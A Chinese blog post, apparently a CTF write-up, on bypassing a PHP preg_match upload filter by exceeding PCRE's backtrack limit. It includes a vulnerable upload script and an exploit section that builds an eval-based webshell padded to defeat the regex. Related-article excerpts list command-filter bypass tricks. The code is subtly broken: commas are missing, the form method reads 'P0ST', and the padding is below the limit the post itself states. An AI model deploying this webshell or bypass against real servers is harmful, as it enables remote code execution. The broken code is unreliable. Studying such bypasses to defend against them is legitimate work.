PHP正则回溯溢出绕过

最新推荐文章于 2021-09-29 23:25:15 发布
最新推荐文章于 2021-09-29 23:25:15 发布
阅读量387 收藏
点赞数 1
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43626025/article/details/120421735
版权

PHP正则回溯溢出绕过

案例代码

<?php
    function is_php($data){
        return preg_match('/<\?.*[(`;?>].*/is'$data);
    }
    if(empty($_FILES)) {
        die(show_source(__FILE__)) ;
    }
    $user_dir = './data/';
    $data = file_get_contents($_FILES['file']['tmp_name']);
    if (is_php($data)) {
        echo 'bad request';
    } else {
        @mkdir($user_dir, 0777) ;
        $path = $user_dir . '/' . random_int(010) . '.php';
        move_uploaded_file($_FILES['file']['tmp_name'], $path) ;
        header ("Location: $path", true, 303) ;
    }
?>

  我们需要上传webshell来控制后台,但是is_php()函数对文件内容做了正则检测;关键点就是需要突破正则检测。

分析

非贪婪匹配原理:
  源字符串: aaab,正则: .?b 匹配过程开始的时候,"?“首先取得匹配控制权,因为是非贪婪模式,所以优先 不匹配,将匹配控制交给下一个匹配字符"b”, “b"在源字符串位置1(从左往右)匹配失败 (“a”),于是回溯,将匹配控制交回给”.?"
  这个时候,".?“在位置1匹配一个字符"a”, 并再次将控制权交给"b","b"继续在位置2匹配,如此反复,最终得到匹配结果。
正则回溯原理
  刚开始匹配 ”<?“ ,然后碰到了贪婪匹配会把后面所有的都给匹配上,再继续到中括号中的匹配,因为后面没有内容了,于是开始回溯匹配,直到匹配到中括号内的字符。

  PHP为了防止正则表达式的拒绝服务攻击(reDOS),给pcre设定了一个回溯次数上限pcre.backtrack_limit,获取PHP正则的回溯次数(默认次数是一百万)
PHP正则代码案例
  preg_match()函数会返回匹配次数,分别是0次(不匹配)和1次,但是如果回溯次数超过一百万次就会返回false。则通过发送超长字符串的方式,使正则执行失败,最后绕过目标对PHP语言的限制。

EXP

# 题解
# 需要先构造一个文件上传页面
<html>
<body>
    <form action="http://xx.xx.xx.xx/php/pcrewaf.php" method="P0ST" enctype="multipart/form-data">
        <h3> Test upload tmp file</h3>
        <label for="file">Filename:</label>
        <input type="file" name="file"/><br/>
        <input type="submit" name="submit" value="Submit" />
    </form>
</body>
</html>
 
# 构造一个能回溯超过一百万次的webshell文件
<?php
    $webshell = "<?php @eval($_POST[1]);".str_repeat('a', 100000);
    file_put_contents('exp.php', $webshell);
?>
s1y1n9aI
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
正则表达式密码策略与正则回溯机制绕过
Miracle_ze的博客
07-20 331
正则表达式与回溯绕过机制
正则回溯php 绕过,PHP利用PCRE回溯次数绕过某些安全限制 | 码农网
weixin_33268205的博客
03-25 374
这次Code-Breaking Puzzles中我出了一道看似很简单的题目 pcrewaf ,将其代码简化如下:function is_php($data){return preg_match('/].*/is', $data);}if(!is_php($input)) {// fwrite($f, $input); ...}大意是判断一下用户输入的内容有没有 PHP 代码,如果没有,则写入文件。...
php 正则 回溯,PHP正则匹配绕过
weixin_33185844的博客
03-10 663
之前没有从机制上去了解过PHP正则匹配绕过具体是怎么一回事,于是主动去网上找了一些资料来加深理解NFA与正则表达式常见的正则引擎,被细分为DFA(确定性有限状态自动机)与NFA(非确定性有限状态自动机)。由于NFA的执行过程存在回溯,所以其性能会劣于DFA,但它支持更多功能。大多数程序语言都使用了NFA作为正则引擎,其中也包括PHP使用的PCRE库。所以这里详细介绍一下NFA(Nondetermi...
php正则绕过
Hammers_12的博客
09-07 1498
一、空格正则绕过: ${IFS} 但不能写作 $IFS $IFS$9 %09 <> < 二、 在PHP中,在正则绕过时可以利用\包裹住被过滤的函数,以此达到绕过的目的。例如: cat 进黑名单,用 c\a\t 绕过 空格进黑名单,用 ${IFS} 或者 %09 绕过 ✳ 和 flag 都被过滤,用和 ✳ 差不多的 ? 绕过,即 ???,获取四位的 flag ...
【Flag】-PHP-正则绕过
soldi_er的博客
09-02 1642
文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考 最近RCTF分站赛要开始了,梳理一些知识。 【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {
正则表达式之回溯
10-29
本篇将深入探讨正则表达式中的回溯机制,这是正则表达式匹配过程中最复杂但也最核心的部分。 首先,让我们了解一下正则表达式在匹配字符串时的基本原则。正则表达式引擎在进行匹配时,通常遵循“优先选择最左端的...
基于正则类sql注入防御的绕过技巧.pdf
08-07
他在议题中介绍了正则类防注入规则的常见绕过办法。分别讲了注释类绕过和长度类绕过,另外也说明了各类waf通常对POST注入默认不开启,通过默认配置的遗漏来绕过注入防御。并展示了拒绝服务漏洞的视频,以及挖掘思路...
PHP正则表达式的效率 回溯与固化分组
12-13
先来看下问题。 字符串 代码如下: $str = ‘[removed]123456[removed... 这三个正则,分别会造成几次回溯呢?? 答案: 代码如下: $strRegex1 = ‘%[removed].+<\/script>%’; //9次,记得区别转义符号。 $strRegex2
php邮箱地址正则表达式验证
01-21
现在用PHP语言实现一下电子邮件地址验证程序,用的是PHP正则表达式库。 源代码如下: <?php header ( Content-Type: text/html; charset=UTF-8 ); $reply = ; if ( isset($_POST[email_address]) ) { $...
php 绕过 正则,Bugku | 数字验证正则绕过
weixin_28949937的博客
03-23 325
语法:int preg_match_all (字符串$ pattern ,字符串$ subject [,数组和$ matches [,整数$ flags = PREG_PATTERN_ORDER [,整数$ offset = 0 ]]] )搜索主题中所有匹配模式给定正则表达式的匹配结果并将它们以标志指定顺序输出到匹配中。在第一个匹配找到后,子序列继续从最后一次匹配位置搜索。参数说明:$ patte...
利用正则回溯最大次数上限进行绕过
young9222的博客
04-04 1572
源码: <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(empty($_FILES)) { die(show_source(__FILE__)); } $user_dir = 'data/' . md5($_SERVER...
利用正则回溯最大次数上限绕过preg_match
yourdawntown的博客
09-29 1394
1. 没有回溯的匹配 假设我们的正则是/ab{1,3}c/,其可视化形式是: 而当目标字符串是"abbbc"时,就没有所谓的“回溯”。其匹配过程是: 其中子表达式b{1,3}表示“b”字符连续出现1到3次。 2. 有回溯的匹配 如果目标字符串是"abbc",中间就有回溯。 图中第5步有红颜色,表示匹配不成功。此时b{1,3}已经匹配到了2个字符“b”,准备尝试第三个时,结果发现接下来的字符是“c”。那么就认为b{1,3}就已经匹配完毕。然后状态又回到之前的状态(即第6步,..
PHP - 函数绕过 - preg_match()
3569
11-29 1万+
http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/   待绕过目标如下 &lt;?php echo preg_match('/&lt;\?.*[(`;?&gt;].*/is', $_GET['a']); 最常见的绕过 数组 http://localhost/?a...
php正则失效-最大回溯(pcre.backtrack_limit)/递归限制
On the way
03-26 6418
昨天,同事在处理一个正则采集程序,发现了一个怪现象:在本地正则规则随便写都可以匹配到,可是上传到服务器后发现正则怎么写都匹配不到。自己调整了半天没有效果,放弃?那就…………,不甘心……,吃过晚饭后,打开电脑随便乱狂博客,还是google了一下,有关正则的规则,找来找去都在谈怎么写正则表达式等。最后静下心来分析了一下。 我和同事的电脑装的都是wamp,php版本都是5.3.x,服务器php版本是5
PHP花式绕过大全
热门推荐
fly夏天的博客
10-18 1万+
做了这么长的时间的ctf,现在总结一下自己做过的题,记录一下各种可能会存在绕过php函数,持续跟新。 各位大佬可以一起交流♂交流。 1.preg_replace ($pattern , $replacement , $subject ) 其中 $pattern为正则表达式 $replacement为替换字符串 $subject 为要搜索...
PHP函数漏洞总结
柠檬木有枝
08-26 2767
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
命令执行中关于PHP正则表达式的一些绕过方法
qq_45521281的博客
04-21 7296
最近做了buuctf上的[极客大挑战 2019]RCE ME,PHP正则的一些绕过方法也终于要用上了,原文地址:https://blog.csdn.net/mochu7777777/article/details/104631142 参考: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html https://w...
代码审计从入门到放弃(二) & pcrewaf
蚁景网安学院
03-19 429
前言 继续之前的2018 Code Breaking,这次是一道关于php回溯bypass正则的题目:pcrewaf 题目概述 题目源码如下 <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(empty($_FILES)) { die(show_so...
Code-Breaking Puzzles easy - pcrewaf(正则特性)
烟敛寒林的博客
05-09 399
题目地址:http://120.78.164.84:49002/ <?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is', $data); } if(empty($_FILES)) { die(show_source(__FILE__)); } $user_dir = 'da...
正则回溯java_正则表达式灾难性回溯
最新发布
06-08
正则表达式中的回溯是指在匹配过程中,出现不匹配的情况,会尝试从前面的匹配中回溯,重新匹配当前字符,直到找到最长的匹配为止。这种回溯操作会导致正则表达式的匹配速度变慢,并且在某些情况下甚至会出现灾难性回溯。 灾难性回溯指的是在某些复杂的正则表达式中,回溯操作会导致程序的运行时间呈指数级增长,甚至导致程序卡死或崩溃。这种情况下,我们可以通过优化正则表达式的结构或使用其他算法来避免回溯操作,提高匹配效率。 在Java中,可以使用预编译的正则表达式来避免回溯操作,例如: ``` Pattern pattern = Pattern.compile("正则表达式"); Matcher matcher = pattern.matcher("待匹配的字符串"); if (matcher.find()) { // 匹配成功 } ``` 此外,还可以通过使用限定符、字符类和非捕获组等方式来优化正则表达式的结构,避免回溯操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值